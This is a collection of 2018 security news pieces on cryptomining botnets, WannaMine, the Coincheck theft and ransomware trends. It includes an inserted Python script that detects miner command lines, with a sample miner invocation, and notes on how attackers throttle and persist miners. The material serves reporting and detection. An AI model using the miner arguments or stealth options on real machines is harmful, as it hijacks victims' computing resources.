"The number of scan [sources] has doubled every 12 [hours]," said Yiming Gong, Director of the Network Security Research Lab at Qihoo 360. "We will see how big this botnet gets."

The botnet appears to be aggressive and keeps growing every day, with infected devices scanning the Internet for further victims. So far, Netlab has detected around 7,400 infected devices.

Scanning for port 5555 recently shot to the #4 spot among Netlab's most-scanned ports, whereas previously it was not even in the top 10.

Most IP addresses scanning for other devices (meaning they are already infected) are located in China (~40%) and South Korea (~30%). Yiming added that the botnet has mostly infected "television related" devices rather than smartphones.

Netlab says ADB.miner reused some of Mirai's port-scanning code, which marks the first time an Android malware strain has borrowed code from Mirai, a strain of Linux-based malware that previously targeted only networking and IoT devices.

However, the researchers have not yet given any details about the ADB vulnerability the attackers are using to take control of devices, but they clarified that they do not believe the bug is specific to a particular vendor. This most likely implies that the bug affects the core of the Android ADB component itself.


Cybersecurity week Round-Up (2018, Week 5)

Cybersecurity week Round-Up (2018, Week 5) - Let’s try to summarize the most important events that occurred last week in 3 minutes.

The week began with massive cyber attacks against three Dutch banks and the National Tax Agency. Experts speculate that Russia was involved, because the attacks started after the revelation that Dutch intelligence had hacked the APT 28 group.

The wave of attacks against the cryptocurrency sector continues.
Security experts spotted two huge botnets and a malware specifically designed to mine cryptocurrency abusing victims’ resources.

The first mining botnet dubbed Smominru was discovered by researchers from Proofpoint. The malware uses the EternalBlue exploit to infect Windows computers and recruit them in Monero cryptocurrency mining activities.

The Smominru botnet has already infected more than half million systems.

It has been estimated that the botnet already mined 8,900 Monero ($2,346,271 at the current rate).

Researchers at Qihoo 360’s Netlab analyzed a new campaign powered by the DDG botnet, the second largest mining botnet ever, that targets Redis and OrientDB servers. The miner has already infected nearly 4,400 servers and has mined over $925,000 worth of Monero since March 2017.

Researchers from security firm CrowdStrike spotted a new Monero crypto-mining worm dubbed WannaMine that spreads leveraging the NSA-linked EternalBlue exploit.

APT groups are even more dangerous. The Iran-linked APT OilRig targets IIS web servers with the new RGDoor backdoor. The backdoor was used in attacks against Middle Eastern government organizations and financial and educational institutions.

South Korea warns of Flash Zero-Day flaw exploited by North Korea in surgical attacks.

In the second part of the week, security experts from Bitdefender detailed the malware Operation PZChao that was attributed to the Chinese Iron Tiger APT.

One of the most clamorous cases of the week is the data leak that involved military personnel data, caused by the improper use of the Strava fitness application.
The data leak exposed information related to military bases worldwide, some of which were not publicly disclosed before.

The Meltdown and Spectre saga is going on.

Over the weekend Microsoft rolled out out-of-band updates to disable mitigations for Spectre v2 attacks, due to problems reported by its customers after the installation of the security patches.

While experts claim Intel reportedly alerted Chinese companies before US Government about Meltdown and Spectre flaws, malware researchers have spotted proof-of-concept malicious code that exploits Spectre and Meltdown flaws.

Researchers at security firm Radware have spotted a new IoT botnet, dubbed JenX, that leverages the Grand Theft Auto videogame community to infect devices.

Crooks target ATMs with Ploutus-D malware; these are the first confirmed cases of jackpotting in the US.

Pierluigi Paganini

(Security Affairs – cybersecurity, cyberweek)

The post Cybersecurity week Round-Up (2018, Week 5) appeared first on Security Affairs.

Japan’s Financial Services Agency raided the Coincheck headquarters in Tokyo after the hack

 

Cryptocurrencies are in the middle of a tempest: on Thursday India announced it would adopt measures to prevent the use of virtual currencies in the country, and the value of Bitcoin dropped below $9,000 for the first time since November. Finance Minister Arun Jaitley, in his annual budget, explained that his government would “take all measures to eliminate use of these crypto-assets in financing illegitimate activities or as part of the payment system”.


A week after the security breach suffered by the virtual currency exchange Coincheck, Japanese authorities raided the company.

The hackers stole 58 billion yen ($530 million), an amount of money that is greater than the value of bitcoins which disappeared from MtGox in 2014.

After the MtGox case, the Japanese government passed a law on cryptocurrencies that assigns to the FSA the task of regulating the exchanges operating in the country.

Coincheck had submitted an application to the FSA for a licence and was waiting for permission.

This week, Coincheck announced it will refund about $400 million to 260,000 customers after the hack, the company will use its own funds.

Coincheck was founded in 2012 and is one of the most important cryptocurrency exchanges in Asia. The company announced it will refund about $400 million to customers after the hack.

Japanese media criticized the company, blaming management for having underestimated the importance of security for its investors; they said Coincheck “expanded business by putting safety second”.

On Friday, agents of the Financial Services Agency raided Coincheck’s headquarters in Tokyo’s Shibuya district with the intent to verify that the company had adopted proper security measures to protect its assets.

“We have launched an on-site inspection to ensure preservation of clients’ assets,” said Finance Minister Taro Aso.

Japan’s Financial Services Agency gave Coincheck until February 13 to investigate the hack, implement additional security measures and “properly” deal with the affected clients.

According to Japanese bitcoin monitoring site Jpbitcoin.com, in November yen-denominated bitcoin trades reached a record 4.51 million bitcoins, or nearly half of the 9.29 million bitcoin traded across the world’s major exchanges.

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

The post Japan’s Financial Services Agency raided the Coincheck headquarters in Tokyo after the hack appeared first on Security Affairs.

Leaked US Army Cyber Protection Brigade Memorandum appears to show Privacy Solutions compromised




The picture in question is a leaked image of a memorandum, posted to the image board 4chan, complete with Department of Defence letterhead and appearing, by all accounts, to be from the United States Army’s Cyber Protection Brigade.

The posted picture shows an official document displayed on a terminal screen, with a Common Access Card (CAC) on one side of it, complete with photograph and typical of a Department of Defence employee. It appears, by all accounts, to be legitimate, yet it invites incredulity and skepticism. In any case, it is still not clear why somebody would want this data leaked.

Another plausible theory is that the crypto community may somehow be involved. After all, an effective way to limit the use of privacy solutions is to seed the environment with rumours that they are anything but private, a scheming way of spreading fear, uncertainty and doubt.

 “The success we have had with Tor, I2P, and VPN, cannot be replicated with those currencies that do not rely on nodes. There is a growing trend in the employment of Stealth addresses and ring signatures that will require additional R&D.” reads the document.

The memo's first line reveals a unit involved with the National Security Administration (NSA) and Cyber Protection Team (CPT) requesting more financing for "new contracts and extra subsidizing to meet GWOT and drug interdiction targets aimed in July's Command update brief," the Global War On Terror (GWOT) being a go-to pretext for about two decades of intrusive military and law enforcement action.

“In order to put the CPT back on track, we need to identify and employ additional personnel who are familiar with the Crypto Note code available for use in anonymous currencies,” the memo stressed.
Crypto Note, which is also the application layer for privacy tokens such as Bytecoin (BCN) and Monero (XMR), uses a memory-bound function that is hard to pipeline. That the relevant agencies tasked with monitoring and tracking internet solutions, and now coins, need outside help with Crypto Note may say a lot about where the various government divisions are in terms of their security expertise.

The picture was circulated on Steemit, Veekly, and even Warosu exactly five months ago, yet outlets such as Deep Dot Web may claim to have broken the news. The document is nonetheless worth dissecting, assuming it is legitimate.


For its part, Deep Dot Web claims to have contacted "a Monero developer, who spoke on condition of anonymity," and the developer "said that the vast majority of the Monero developers who have seen the leak believe it to be true. A few sources who were formerly in the Army have also said they believe the report to be genuine." This supports the view that the contents of the document appear entirely plausible.

WannaMine: Cryptocurrency Mining Malware That Uses An NSA Exploit

WannaMine Malware That Uses NSA Exploit To Mine Cryptocurrencies Is On The Rise

The recent months have seen an increase in cyberattacks using cryptocurrency-mining tools, which has now become one of the main security threats.

In April last year, the ‘EternalBlue’ exploit, formerly owned by the US National Security Agency (NSA), was leaked to the public by hacking group Shadow Brokers. This exploit was then used as a base in the WannaCry virus that infected more than 230,000 computers running the Microsoft Windows operating system in 150 countries in May 2017.

Now, researchers at CrowdStrike, a cybersecurity company, have discovered a new strain of malware that uses the ‘EternalBlue’ exploit to hijack victims’ computers and CPU processing power to secretly mine cryptocurrency, in a new attack dubbed WannaMine.

“CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and propagation techniques similar to those used by nation-state actors,” the researchers said in a blog post published on January 25.

“WannaMine employs ‘living off the land’ techniques such as Windows Management Instrumentation (WMI) permanent event subscriptions as a persistence mechanism. It also propagates via the EternalBlue exploit popularized by WannaCry.”

This WannaMine malware is quite similar to the one detected by Panda Security in October last year, which was also based on the EternalBlue exploit and, in that case, used the infected computer to mine Monero.

According to the new report, WannaMine can infect a computer in several ways, such as clicking a malicious link in an email or website, or through remote access attack on the victim. In most cases, the victim will not notice anything, except that the computer runs slower.

This malware is difficult for companies to defend against, as it does not need to download any type of file to infect the computer. Since WannaMine is a fileless operation and uses legitimate system software such as WMI and PowerShell to run, it is nearly impossible for organizations to detect and block it without some form of next-generation antivirus. However, WannaMine doesn’t immediately resort to the EternalBlue exploit.

It first uses a tool called “Mimikatz” to recover logins and passwords from system memory and tries to infiltrate the system with those. If that fails, WannaMine turns to the EternalBlue exploit to complete the task and break in.

Once the attack is successful, WannaMine quietly uses the CPU processing power to generate Monero coins in the background. “The WannaMine worm uses advanced techniques to maintain persistence within an infected network and move laterally from system to system,” the researchers said. “In one case, a client informed CrowdStrike that nearly 100% of its environment was rendered unusable due to overutilisation of systems’ CPUs.”

According to CrowdStrike specialists, the number of attacks has increased sharply since the beginning of 2018, and one can expect to see much more cryptomining activity in the coming months, resulting in business disruptions and downtime.

The post WannaMine: Cryptocurrency Mining Malware That Uses An NSA Exploit appeared first on TechWorm.

Ransomware’s difficult second album

The last year has seen all manner of cybercrime, from scams and social engineering to malvertising and malspam. What’s interesting is that so many “next-gen,” sophisticated malware mainstays like exploits have dropped in popularity, while other more traditional types such as spyware have shot up dramatically, to the tune of an 882 percent increase in UK detections.

Meanwhile, here’s ransomware pretty much falling off a cliff, dropping as low as a 10 percent infection rate in December 2017:

Ransomware drop


Why is everyone jumping on the “I used spyware perfectly fine in 2007, and now I will again” bandwagon? Why is ransomware stagnating and tailing off? What omnipresent entity is dancing away behind the scenes, tying connections together and ensuring today’s attack news is yesterday’s old newspapers?

One of the answers, for me anyway, is Bitcoin.

(Digital) money makes the world go round

For many people in security circles (both victims and researchers), the first time coming across any mention of Bitcoin was through the payment demanded by ransomware authors. I have far too many memories of victims asking me what on Earth a Bitcoin was as they stared at the ransom screen blinking out from their computers. Bitcoin quickly became the payment method of choice over and above the formerly more common “send us an iTunes card code or wire us some money” demands.

From there, the professional criminal community fully embraced Bitcoin as the payment method of choice. They started utilizing TOR onion links to further anonymize the transaction, and layered on lots of other tactics that frankly required scammers to include FAQs in multiple languages just to ensure victims knew what they had to do next.

FAQ


Once the script kiddies and amateur hour developers saw the big players raking in Bitcoin cash, they decided they wanted some of the same. We then had lots of pieces of poorly designed, DIY ransomware. You couldn’t always guarantee files would be decrypted after payment, and often it was impossible to tell if this was done intentionally or by accident. Even some of the big names didn’t always do what they were supposed to do.

The weird thing about ransomware is that it relies on dishonest developers being, well, honest. If people are coughing up lots of money to get their files back and it isn’t happening, word of mouth and a rapid press response will ensure the law of diminishing returns kicks in. People will either get smart and back up their files or simply resign themselves to losing them. A nice little earner suddenly becomes a big pile of nothing. Or, to put it another way:

Get in the bin

For those wanting to ply their trade over a long time, this is, of course, not a good result.

The great ransomware fightback of 2017

Alongside bad developers and increased public visibility after some huge outbreaks in 2017, security tools have become better equipped to deal with ransomware threats. In addition, lots of standalone programs have been made by independent researchers to decrypt files. This increased awareness of ransomware prevention (backing up files, using security tools), alongside decreasing prices for file storage, has really helped to defang the ransomware menace to some degree. It’s no longer the killer app it once was for scammers, and with a few precautions in place, it loses much of its power.

And then, at last, we come to the Bitcoins themselves. You don’t need me to tell you the price is simultaneously through the roof and in the toilet, on the kind of crazy rollercoaster ride you just can’t predict. Back in the days when they weren’t quite so highly valued, ransomware authors could afford to get away with asking for the odd coin or two. Now? Frankly, they’re taking a huge leap of faith that someone can summon up the cryptocash to get their files back.

There are many pieces of ransomware out there that can be controlled by Command & Control servers; new files can be downloaded as required, and, if needed, criminals can tweak values to more manageable figures. Trouble is, there’s no guarantee our malware-developing friend is sitting there monitoring the rise and fall and rise and rise and fall of Bitcoin. It’s also entirely possible they don’t really care if the coin value on display is a bit too much to pay, because another victim will be along in a minute.

As for the DIY/home-brew contingent? Everything may well be hardcoded into the file, with no way to alter it once it lurches into the wild. At that point, if they’re asking for four Bitcoins and the price triples overnight, there’s a good chance they won’t be getting any money out of it.

There are many other factors at play of course, but “we’re slowly strangling ourselves out of the market by asking for ridiculous amounts of money” is certainly a rather large warning sign.

Swings, roundabouts, and the path of least resistance

There is a cyclical nature to attacks. They tend to swing from stealth being the “in” thing, to overt displays of fireworks on your desktop, to covert action becoming the new (old) hotness, and so on. Back in the day, old-school adware vendors had their programs bundled alongside other spyware, and the desktop would be ablaze with pop-ups, pop-unders, sliders, extensions—you name it. The idea was to generate as many ad impressions as possible before the affiliate networks were shut down. A quick apology, “It’ll never happen again,” and sure enough, they’d be right back at it a few days later.

Once security tools and public awareness had reached a tipping point and big legal things started to happen, many vendors went broke or moved onto pastures new. Those that remained knew they had to go dark, and from about 2008 onward you started to see a lot less fireworks and a lot more invisible assassins. (Well, not see them, exactly, given they were invisible, but anyway.)

Stealthy malware and silent botnets clinging onto a PC as covertly as possible for as long as they could was the order of the day. Eventually, these methods, too, fell out of favour, and cybercriminals started to ramp up more visible scams in the form of the evergreen fake antivirus/tech support scams, and social engineering on social media portals.

We’re seeing a similar pattern now with ransomware. Ransomware catches plenty of victims out the gate, but not so much once everyone has wised up a little. If ransomware groups can’t even get their hands on Bitcoins by wandering into a victim’s home at 2am and loudly announcing the takeover of their PC, it’s surely a lot easier to jump on the cryptomining craze and return to the digital shadows.

mining

The advantages to moving into stealth mode are obvious. First, there are no more splashy takeovers. Splashy takeovers don’t last long on PCs these days. Second, the movement to covertly mine for coins using the victim’s GPU horsepower—without them knowing about it—has potential for longer-term gains. That’s the theory, at least; in reality, many people will notice fans spinning up, or computers under higher load or just plain old not responding. Even so, a lot of those people may just pass it off as “one of those things my computer does.” It’s a trade off, and not likely to make more money than kicking the door in and screaming for free coins, but it’s definitely a lot sneakier.

Finally, it’s a lot less hassle to just throw some script on a website, as opposed to building the ransomware, paying some developers, messing around with onion sites, writing up long FAQs for the victims, maintaining C&C servers, ensuring the decryption of hijacked files actually works, and so on. And cybercriminals delivering any kind of attack have noticed.

As we said in our blog on the 2017 State of Malware report:

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

It isn’t just scripts mining for coins in the background of low traffic, unknown websites, either. In the last few days, we’ve also seen signs of Google’s DoubleClick ads on Youtube serving as the launchpad for Coinhive mining scripts. If you’re hunting around for websites for your kids, you may well run into mining scripts there, too. This kind of furtive mining is a bit of a fast moving plague, and throws the old arguments over blocking ads while hurting publishers to the foreground once more.

And while we’re talking about paths of least resistance, there are many other types of scams taking aim at digital coins; the sky is the limit, and bad actors don’t seem worried about locking themselves into the same old tried and tested methods.

Everywhere you look, digital currency is causing headaches across the board. Malware miners. Fake wallets in official mobile stores. Covert scripts quietly gobbling up power cycles in the background. Gamers unable to buy graphics cards due to miners hogging stock, resulting in shops selling them at a discount with gaming components. Even fake fonts are in on the act.

fake fonts

Ransomware: not dead yet

Ransomware may be losing its cool factor, but it’s definitely not dead and buried—not by a long shot. Many ransomware authors appear to be in a bit of a self-imposed time-out. Except these guys aren’t feeling guilty. It’s more like “let’s see what horrible new thing we can come up with next.”

There are already a few signs of desperate, scorched-earth ransomware attack methods, with the so-called “SpriteCoin” hurling malware at victims once they’ve paid to recover their files. Elsewhere, we have ransomware effectively trying to cannibalize each other’s payments. This infighting certainly isn’t a good thing for the victims, especially when their payments are ending up with the wrong malware groups—nobody is getting their files back in that scenario. Stack that alongside the “bad” ransomware not decrypting files, and you have yet another reason why people will, eventually, choose not to pay.

The future may or may not be Bitcoin, but for now, it almost certainly isn’t ransomware. Give it time while the battle to establish exactly what ransomware is about plays out behind the scenes, though. Eventually, the pendulum always swings back.

The post Ransomware’s difficult second album appeared first on Malwarebytes Labs.

India bans cryptocurrencies, but will further explore blockchain

The Indian government doesn’t recognize bitcoin as legal tender and is fully committed to eliminating cryptocurrency payments from its system, Bloomberg writes. Government officials have repeatedly called cryptocurrency payments mere ‘Ponzi schemes’ and sent out thousands of tax notices to cryptocurrency investors.

Despite banning the purchase and sale of cryptocurrency, the Indian government wants to further explore blockchain technology (on which bitcoin is based).

“The government does not consider cryptocurrencies legal tender or coin and will take all measures to eliminate use of these crypto-assets in financing illegitimate activities or as part of the payment system,” Finance Minister Arun Jaitley told lawmakers in New Delhi on Thursday. “The government will explore use of blockchain technology proactively for ushering in digital economy.”

India is not the only country taking measures affecting cryptocurrencies; South Korea and China also announced recently they would regulate cryptocurrencies.

Generally, countries have different policies regarding cryptocurrencies and are looking into either banning them or legalizing cryptocurrency payments by enforcing the same taxes and reporting obligations as for traditional currency.

Social media giant Facebook announced this week that it will ban ads promoting “financial products and services that are frequently associated with misleading or deceptive promotional practices, such as binary options, initial coin offerings and cryptocurrency.”

Following Jaitley’s announcement that India will ban cryptocurrencies, bitcoin, ripple and ethereum prices dropped dramatically.

Massive Smominru Cryptocurrency Botnet Rakes In Millions

Researchers say Smominru threat actors are in control of 500,000 node botnet and earning $8,500 daily mining for Monero cryptocurrency.

The State of Security: Facebook’s New Policy Bans All Ads Promoting Cryptocurrencies

Facebook announced on Tuesday its plans to ban all ads that promote Bitcoin and other digital currency exchanges, initial coin offerings (ICOs) and binary options. The social network said the new policy aims to protect users from scams, describing such financial services as “frequently associated with misleading or deceptive promotional practices.” In a company blog […]… Read More

The post Facebook’s New Policy Bans All Ads Promoting Cryptocurrencies appeared first on The State of Security.


Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions

The Dark Side of the Digital Gold Rush


This post was authored by Nick Biasini, Edmund Brumaghin, Warren Mercer and Josh Reynolds with contributions from Azim Khodijbaev and David Liebenberg.


Executive Summary


The threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining related attacks have emerged as a primary interest for many attackers who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks.

This focus on mining isn't entirely surprising, considering that various cryptocurrencies along with "blockchain" have been all over the news as the value of these currencies has exponentially increased. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. Over the past several months Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims.

In this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom. Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining. In these cases the better the performance and computing power of the targeted system, the better for the attacker from a revenue generation perspective. IoT devices, with their lack of monitoring and lack of day to day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high which may make them attractive to cyber criminals moving forward.

To put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat), could generate $500 per day or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which using our previous logic means that these systems could be leveraged to generate more than $100 million per year theoretically. It is important to note that due to volatility present across cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing.

This is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks exponentially:
  • The value of many cryptocurrencies is skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.
  • These attacks are much stealthier than their predecessors. Attackers are not stealing anything more than computing power from their victims, and the mining software isn't technically malware, so theoretically the victims could remain part of the adversary's botnet for as long as the attacker chooses.
  • Once the currency is mined, there is no telling what the attacker might do with it. This could become a long term investment (or even retirement) scheme for these attackers – sitting on this currency until it hits such a point where the attacker decides to cash in.

Introduction


Throughout the past couple of years ransomware has dominated the threat landscape and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations with the use of ransomware. First is the fact that only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks the pool of possible victims is changing. Potential victims in many countries lack the financial capabilities to pay $300-$500 to retrieve their data. Possibly related to these aforementioned limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods for malware distribution such as exploit kits and spam campaigns.

Over the past several months Talos has started to observe a marked increase in the volume of cryptocurrency miners being delivered to victims. Cryptocurrency and "blockchain" have been all over the news over the past several months as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining and adversaries are obviously paying attention.

What is 'Mining'?


At a high level mining is simply using system resources to solve large mathematical calculations which result in some amount of cryptocurrency being awarded to the solvers. Before we get too deep into mining let's address the currencies that make sense to mine.

Bitcoin (BTC) is the most well known and widely used cryptocurrency by a wide margin. It's been mined since its inception, but today mining isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences across the different cryptocurrencies are based on the hashing algorithm used. Some have been specifically designed in an attempt to prevent or hinder the use of such specialised hardware and are more focused on consumer grade equipment such as CPU & GPU hardware. Currently, the most valuable currency to mine with standard systems is Monero (XMR) and adversaries have done their research. In addition Monero is extremely privacy conscious and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with heavy emphasis on privacy may become a safe haven for threat actors.

There are two ways that mining can be performed, either with a stand alone miner or by leveraging mining pools. Pool-based crypto mining allows you to pool the resources of multiple systems resulting in a higher hashrate and theoretically the production of increased amounts of currency. It's pool-based mining of Monero that we have seen most frequently leveraged by attackers as it allows for the greatest amount of return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in standard systems that attackers attempt to compromise. This is similar to launching Distributed Denial of Service (DDoS) attacks where 100,000 machines flooding a target with bogus traffic becomes much more effective compared to a single system under the attacker's control sending bogus traffic.

How does pool based mining work?


Pool-based mining is coordinated through the use of 'Worker IDs'. These IDs are what tie an individual system to a larger pool and ensure that the coins mined by the pool under a particular Worker ID are delivered to the correct user. It's these Worker IDs that allowed us to determine the size and scale of some of the malicious operations as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will be assuming the following:
  1. The amount of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.
  2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful as it allows for a better understanding of the earning potential for these malicious mining pools.
These miners typically operate from the command line and make use of a series of arguments used to establish how the mining should be performed. A typical example of the command line syntax used to execute the mining software and specify the arguments is below: (note that there are variations in the parameter names used based on the specific mining software being used.)
Example Command Line Syntax

As you can see there are two primary argument values required: the URL for the mining pool and the 'Worker ID' that is used to tie the mining activity taking place on the system to a specific mining pool account, which is used to manage how payouts are conducted. However, through our investigation we have found a plethora of other parameters that attackers or miners can specify in an attempt to hide their activities. If the mining software is executed without these options, victims might notice significant performance degradation on their systems as no computing resource limits are enforced. These options include:
  • Limits on CPU Usage.
  • Limits on System Temperature.
  • Amount of cores being used.
  • Sleep periods.
Each mining program comes with its own set of flags that are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they achieve persistence (i.e. through the creation of Scheduled Tasks or Run keys that execute the miner using the Windows Command Processor specifying the arguments to use).
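As an added triage example (not Talos's own tooling), the following parses a miner-style command line of the shape described above, pulling out the pool endpoint, the Worker ID and any throttling options, so that Scheduled Task or Run key command lines can be scored. Only the `-o` and `-u` flags appear in this post; the other flag names, the regular expressions and the sample command lines are assumptions constructed here.

```python
"""Score process command lines for cryptominer launch arguments.

Added example, not code from the Talos post. Flag names beyond -o and -u
are assumed from xmrig-style miners and may differ between miner builds.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, Iterator, List, Optional, Tuple

POOL_FLAGS = {"-o", "--url"}            # pool endpoint (on the page: -o)
WORKER_FLAGS = {"-u", "--user"}         # Worker ID / wallet (on the page: -u)
# Resource-limiting options of the kind the post describes; names assumed.
THROTTLE_FLAGS = {"--max-cpu-usage", "--cpu-priority", "-t", "--threads"}

# host:port, optionally with a stratum scheme, as used for mining pools.
POOL_RE = re.compile(r"^(?:stratum\+(?:tcp|ssl)://)?(?P<host>[A-Za-z0-9.\-]+):(?P<port>\d{1,5})$")
# Monero mainnet standard addresses are 95 base58 characters starting with '4'.
XMR_ADDR_RE = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")


@dataclass
class MinerIndicators:
    pool: Optional[str] = None
    worker_id: Optional[str] = None
    throttles: Dict[str, str] = field(default_factory=dict)
    score: int = 0


def _pairs(argv: List[str]) -> Iterator[Tuple[str, Optional[str]]]:
    """Yield (flag, value) for '-f value' and '--flag=value' forms."""
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--") and "=" in tok:
            name, val = tok.split("=", 1)
            yield name, val
            i += 1
        elif tok.startswith("-") and i + 1 < len(argv) and not argv[i + 1].startswith("-"):
            yield tok, argv[i + 1]
            i += 2
        else:
            yield tok, None
            i += 1


def parse_miner_cmdline(cmdline: str) -> MinerIndicators:
    """Extract miner indicators; whitespace split is enough because the
    arguments of interest never contain spaces (a quoted executable path
    with spaces only affects the first token, which is not inspected)."""
    ind = MinerIndicators()
    for flag, val in _pairs(cmdline.split()):
        if flag in POOL_FLAGS and val:
            m = POOL_RE.match(val)
            if m:                       # '-o report.html' on curl does not match
                ind.pool = f"{m['host']}:{m['port']}"
                ind.score += 2
        elif flag in WORKER_FLAGS and val:
            ind.worker_id = val
            ind.score += 3 if XMR_ADDR_RE.match(val) else 1
        elif flag in THROTTLE_FLAGS and val is not None:
            ind.throttles[flag] = val   # stealth options: weaker but cumulative
            ind.score += 1
    if ind.pool and ind.worker_id:
        ind.score += 2                  # both mandatory arguments present
    return ind


def flag_miner(cmdline: str, threshold: int = 5) -> bool:
    """True when the command line scores at or above the triage threshold."""
    return parse_miner_cmdline(cmdline).score >= threshold


# Constructed sample command lines (not from a real incident).
SAMPLE_CMDLINES = [
    r"C:\Users\Public\update.exe -o pool.minexmr.com:4444 -u 4" + "A" * 94
    + " -p x --max-cpu-usage=50 -t 2",
    r"C:\Tools\curl.exe -o report.html https://example.com",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        ind = parse_miner_cmdline(line)
        print(f"score={ind.score} pool={ind.pool} throttles={ind.throttles}")
```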

Origins on the Underground


Talos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016 and the interest has been steadily building since that time.

From a Russian underground perspective there has been significant movement related to mining in the last six months. There have been numerous discussions and several offerings on top-tier Russian hacking forums. The discussions have been split, with the majority of the discussion around the sale of access to mining bots, as well as bot developers looking to buy access to compromised hosts for the intended purpose of leveraging them for crypto mining. The popularity increase has also been accompanied by a learning curve associated with mining, including a better understanding of how much coin can be mined and the opportune times to conduct the mining activity. As for the malware that can be used to conduct mining, most of it is written in C# or C++ and, as is common on these forums, it is advertised with low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis.

In general the attackers have been pleased with the amount of revenue the bots generate as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that are delivering them.

Malicious Mining


Malicious mining is the focus of this post since it's an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities and malicious mining is quickly becoming a cash cow for the bad guys.

Over the past several years ransomware has dominated the threat landscape from a financially motivated malware perspective and with good reason. It is an extremely profitable business model as we've shown through our Angler Exploit Kit research where we estimate that the adversaries behind Angler could have been conservatively making at least $30 million annually. However, with success comes attention and with that attention came an increased focus on stopping this type of activity. Both operating systems and security vendors got better at stopping ransomware before it affected much of the system.

Adversaries are left with an interesting decision: continue leveraging ransomware as a primary source of revenue as the pool of users and vulnerable systems continues to shrink, or begin leveraging other payloads. There is no shortage of options available to bad guys, including banking trojans, bots, credential stealers, and click-fraud malware to name a few.

So why choose crypto mining software?

There are many reasons why adversaries might choose to leverage crypto mining to generate revenue. One likely reason is that this is a largely hands-off infection to manage. Once a system has a miner dropped on it and starts mining, nothing else is needed from an adversary perspective. There isn't any command and control activity and it generates revenue consistently until it's removed. So if an adversary notices a drop-off in nodes mining to their pool, it's time to infect more systems. Another is that it's largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, hiding below the user's notice for as long as possible. The longer the user doesn't notice the miner running, the larger the potential payout for the activity.

The biggest reason of them all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein malicious miners could be a pretty large source of revenue. The biggest cost associated with mining is the hardware to mine and the electricity to power the mining hardware. By leveraging malicious miners attackers can take both of those costs out of the equation altogether. Since they are able to take advantage of computing resources present in infected systems, there is no cost for power or hardware and attackers receive all the benefits of the mined coin.

Let's take a deeper dive on the amount of revenue these systems can potentially generate. As mentioned earlier the hashrate for computers can vary widely depending on the type of hardware being used and the average system load outside of the miners. An average system would likely compute somewhere around 125 hashes per second. One system alone without any hardware or electricity cost would generate about $0.25 of Monero a day, which doesn't seem like a lot but when you start pooling systems the amount of earning potential increases rapidly.

Some of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later in the post we have seen malicious pools that far exceed the 125 KH/s necessary to generate this type of revenue.

In one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the below screenshot the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero.
Worker ID Statistics

In a series of attacks that we observed that began at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). In these cases, successful exploitation would often lead to the installation and execution of mining software.
Historical Hash Rate

